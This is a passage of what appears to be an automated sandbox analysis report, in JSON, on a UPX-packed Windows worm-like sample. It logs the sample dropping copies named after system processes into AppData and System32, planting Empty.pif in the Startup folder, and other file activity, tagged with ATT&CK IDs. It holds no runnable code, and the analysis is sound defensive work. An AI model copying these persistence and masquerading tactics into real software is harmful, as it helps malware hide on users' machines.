\"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00006008)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00006060)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38\" has an writable section named \"UPX0\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38\" has an writable section named \"UPX1\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38\" has an writable section named \".rsrc\"\n \"CSRSS .exe\" has an writable section named \"UPX0\"\n \"CSRSS .exe\" has an writable section named \"UPX1\"\n \"CSRSS .exe\" has an writable section named \".rsrc\"\n \"services.exe\" has an writable section named \"UPX0\"\n \"services.exe\" has an writable section named \"UPX1\"\n \"services.exe\" has an writable section named \".rsrc\"\n \"shell.exe\" has an writable section named \"UPX0\"\n \"shell.exe\" has an writable section named \"UPX1\"\n \"shell.exe\" has an writable section named \".rsrc\"\n \"4k51k4.exe\" has an writable section named \"UPX0\"\n \"4k51k4.exe\" has an writable section named \"UPX1\"\n \"4k51k4.exe\" has an writable section named \".rsrc\"\n \"IExplorer.exe\" has an writable section named \"UPX0\"\n \"IExplorer.exe\" has an writable section named \"UPX1\"\n \"IExplorer.exe\" has an writable section named \".rsrc\"\n \"New Folder.exe\" has an writable section named \"UPX0\"\n \"New Folder.exe\" has an writable section named \"UPX1\"\n \"New Folder.exe\" has an writable section named \".rsrc\"\n \"Data HAPUBWS.exe\" has an writable section named \"UPX0\"\n \"Data HAPUBWS.exe\" has an writable section named \"UPX1\"\n \"Data HAPUBWS.exe\" has an writable section named \".rsrc\"\n \"Empty.pif\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38\" has an executable section named \"UPX0\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38\" has an executable section named \"UPX1\"\n \"CSRSS .exe\" has an executable section named \"UPX0\"\n \"CSRSS .exe\" has an executable section named \"UPX1\"\n \"services.exe\" has an executable section named \"UPX0\"\n \"services.exe\" has an executable section named \"UPX1\"\n \"shell.exe\" has an executable section named \"UPX0\"\n \"shell.exe\" has an executable section named \"UPX1\"\n \"4k51k4.exe\" has an executable section named \"UPX0\"\n \"4k51k4.exe\" has an executable section named \"UPX1\"\n \"IExplorer.exe\" has an executable section named \"UPX0\"\n \"IExplorer.exe\" has an executable section named \"UPX1\"\n \"New Folder.exe\" has an executable section named \"UPX0\"\n \"New Folder.exe\" has an executable section named \"UPX1\"\n \"Data HAPUBWS.exe\" has an executable section named \"UPX0\"\n \"Data HAPUBWS.exe\" has an executable section named \"UPX1\"\n \"Empty.pif\" has an executable section named \"UPX0\"\n \"Empty.pif\" has an executable section named \"UPX1\"\n \"CSRSS.EXE.bin\" has an executable section named \"UPX0\"\n \"CSRSS.EXE.bin\" has an executable section named \"UPX1\"\n \"SERVICES.EXE\" has an executable section named \"UPX0\"\n \"SERVICES.EXE\" has an executable section named \"UPX1\"\n \"4K51K4.EXE.67A9C469.bin\" has an executable section named \"UPX0\"\n \"4K51K4.EXE.67A9C469.bin\" has an executable section named \"UPX1\"\n \"SMSS.EXE\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"CSRSS .exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"services.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"shell.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4k51k4.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IExplorer.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"New Folder.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"Data HAPUBWS.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"Empty.pif\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"CSRSS.EXE.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"SERVICES.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9C469.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"SMSS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"LSASS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"MrHelloween.scr\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9C7EE.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9C717.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"WINLOGON.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"CSRSS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IEXPLORER.EXE.67A9C46B.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IEXPLORER.EXE.67A9C719.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00000404]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00000404]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00000404]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00000404]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00000404]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\Windows\\4k51k4.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\4k51k4.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"c:\\users\\desktop.ini\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"c:\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"c:\\windows\\4k51k4.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"c:\\4k51k4.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"c:\\windows\\system32\\shell.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"c:\\windows\\system32\\iexplorer.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" connecting to \"\\ThemeApiPort\"\n \"4k51k4.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"WINLOGON.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Windows\\4k51k4.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Windows\\System32\\MrHelloween.scr\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\LSASS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\winlogon.exe\" (UID: 5712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" queries basic process information of the \"C:\\Puisi.txt\" (UID: 5712)\n \"4k51k4.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 6008)\n \"4k51k4.exe\" queries basic process information of the \"C:\\Puisi.txt\" (UID: 6008)\n \"IExplorer.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 6060)\n \"IExplorer.exe\" queries basic process information of the \"C:\\Puisi.txt\" (UID: 6060)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 6128)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 6128)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe.cfg\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe.cfg\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe.Local\\\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" trying to access non-existent file \"C:\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" writes file \"c:\\windows\\4k51k4.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" writes file \"c:\\4k51k4.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" writes file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\lsass.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\smss.exe\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" writes file \"c:\\puisi.txt\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" writes file \"c:\\4k51k4\\folder.htt\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"CSRSS .exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00000404]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\4k51k4.exe]- [targetUID: 00000000-00000404]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00000404]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00000404]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00000404]\n \"4K51K4.EXE.67A9C469.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00000404]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00000404]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\MrHelloween.scr]- [targetUID: 00000000-00000404]\n \"4K51K4.EXE.67A9C7EE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C717.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00000404]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00000404]\n \"IEXPLORER.EXE.67A9C46B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C719.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Folder.htt\" has type \"HTML document ASCII text with CRLF line terminators\"- [targetUID: N/A]\n \"Puisi.txt\" has type 